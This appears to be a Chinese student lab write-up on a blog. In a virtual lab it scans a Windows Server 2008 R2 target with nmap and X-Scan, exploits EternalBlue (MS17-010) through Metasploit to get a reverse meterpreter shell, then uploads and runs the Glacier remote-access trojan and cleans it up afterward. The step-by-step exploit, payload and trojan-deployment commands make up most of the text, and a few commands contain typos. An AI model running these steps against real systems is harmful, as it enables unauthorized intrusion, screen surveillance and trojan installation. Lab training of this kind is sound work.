nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河

目录

第一部分,利用nmap进行扫描

第二部分,利用X-Scan扫描

第三部分,开始入侵

第四部分,冰河远程控制


一、实验目的

利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河控制靶机,最后用冰河陷阱清除靶机的冰河,记一次完整的入侵控制实验。

二、实验环境

工具软件:VMware、nmap、X-Scan 3.3、Metasploit、冰河、冰河陷阱

实验准备:虚拟机Kali Linux 2022.2、虚拟机Windows server 2008 r2、虚拟机Windows XP

注意:本实验中,Kali为攻击机,XP和08r2为靶机

三、实验内容(实验步骤、测试数据等)

08r2的ip:192.168.63.131

用ping测试08r2与Kali的网络连通性

Kali的ip:192.168.63.132

用ping测试Kali与08r2的网络连通性

第一部分,利用nmap进行扫描

本部分在攻击机Kali中进行,目的为扫描出靶机可能存在的漏洞,为攻击找到突破口

(1)使用nmap扫描目标网络,只进行主机发现,不扫描端口

在攻击机Kali终端中使用nmap工具

命令:nmap -sP 192.168.63.0/24(扫描该网段存活的主机)

观察到该网段存活4台主机

其中192.168.63.131是08r2,192.168.63.132是Kali本身

(2)使用nmap扫描目标操作系统信息、服务版本信息

命令:nmap -nmap -O 192.168.63.131(扫描靶机08r2的操作系统信息、服务版本信息)

或者命令:namp -O 192.168.63.131

(3)使用nmap脚本扫描,找出目标主机ms08-067,ms17-010漏洞

命令:nmap --script=Vuln 192.168.63.131

192.168.63.131为08r2的ip地址,即靶机的ip地址

扫描发现ms17-010漏洞,无ms08-067漏洞

第二部分,利用X-Scan扫描

本部分在靶机08r2中进行,目的为扫描出自身可能存在的漏洞

执行X-Scan,选择菜单栏设置下的菜单项“扫描模块”,确定要扫描主机的IP地址或者IP地址段,选择菜单栏设置下的菜单项“扫描参数”,扫描一共服务器主机,在指定IP范围框中输入IP地址。并勾选部分扫描参数,设置完毕后,进行漏洞扫描,点击工具栏上的绿色图标“开始”,开始对目标主机进行扫描

靶机08r2的ip:192.168.63.131

因为是扫描自身,所以指定IP范围直接指定自身的ip地址即可,当然想要扫描同一网段中其他主机的情况可以在地址簿中添加或者修改范围

设置扫描范围操作截图如下:

设置字典截图如下:

扫描过程截图如下:

扫描结束后,X-Scan会生成一个扫描报告

在报告中具体情况具体分析

X-Scan工具古老,适合初学者体验

现在已经是落后的工具,所以在不同的环境中扫描结果或许会有出入

第三部分,开始入侵

(1)利用smb协议漏洞exploit ms17_010对靶机进行攻击

命令:msfconsole(在Kali中打开渗透测试工具Metasploit)

命令:search ms17-010

发现4个攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue(或者“use 序号”,即“use 0”)

选择第0个攻击模块

命令:show options

查看RHOSTS(目标主机ip,靶机ip)和LHOST(自身ip,自身ip)的设置情况,如下图:

命令:show payloads

查看载荷,如下图:

命令:set payload payload/windows/x64/meterpreter/reverse_tcp

选择上图序号为16的载荷,不同版本Kali序号不同

命令:set RHOST 192.168.63.131

设置目标主机/靶机ip地址,即08r2的ip地址192.168.63.131

命令:set LHOST 192.168.63.132

设置本地主机/攻击机ip地址,即Kali自身的ip地址192.168.63.132

命令:exploit

开始执行

成功,meterpreter 会话1已打开

第四部分,冰河远程控制

(1)msf建立连接后,利用Meterpreter 命令上传木马到靶机

命令:ps

查看08r2的系统进程

命令:screenshot

拍摄08r2的屏幕截图

命令:run vnc

监控08r2的屏幕

(2)让冰河在靶机中运行

命令:upload /home/kali/Desktop/G_Server.exe C:/

upload 木马存储路径 目标主机存储路径

利用upload把冰河从本地上传到08r2的桌面,即C:/

命令:execute -f C:/G_Server.exe

利用execute命令使冰河在目标主机运行

该命令使冰河G_Server.exe在08r2中运行,打开cmd输入netstat -an,发现7626端口没有被打开(被冰河感染后7626端口会被打开

不过依然有其他特征表明被感染

特征一:08r2进程列表中名为kernel32.exe的进程正在运行

kernel32.exe是冰河感染后运行在C:\Windows\system32的木马进程

特征二,运行冰河陷阱弹出提示本机被感染

所以虽然7626端口没有被打开,但是本机还是被感染了冰河

本实验未改动冰河默认感染端口,靶机防火墙是关闭状态,7626端口没有被打开有点奇怪,大概率是08r2的版本问题

为了更好地模拟普遍情况,观察7626端口是否会被打开,本实验后续靶机更换为Windows XP,继“已入侵的情况下”进行实验

切换到XP

双击运行G_Server.exe,使XP感染冰河

双击运行后,系统无明显反应

在终端中查看7626端口是否被打开(7626端口被打开是被冰河感染的征兆

命令:netstat -an

查看当前端口状态

发现7626端口被打开,XP已被冰河感染

XP的ip:192.168.63.139

切换到Kali

双击运行G_Client.exe(冰河的客户端)

在起始域输入XP的网段

成功搜索到XP的ip:192.168.63.139

成功连接,可以尝试各种远程操作

冰河远程控制界面如下:

(3)靶机使用冰河陷阱清除冰河,并设置蜜罐捕获控制机

四、实验体会

本实验使用nmap和X-Scan扫描出永恒之蓝漏洞,在Metasploit中使用永恒之蓝漏洞入侵靶机,建立连接后用冰河感染靶机,最后用冰河陷阱清除冰河。算是一次排除万难、流程清晰的实操,收获不小,供初学者有参考意义。

  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

那我的单纯呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值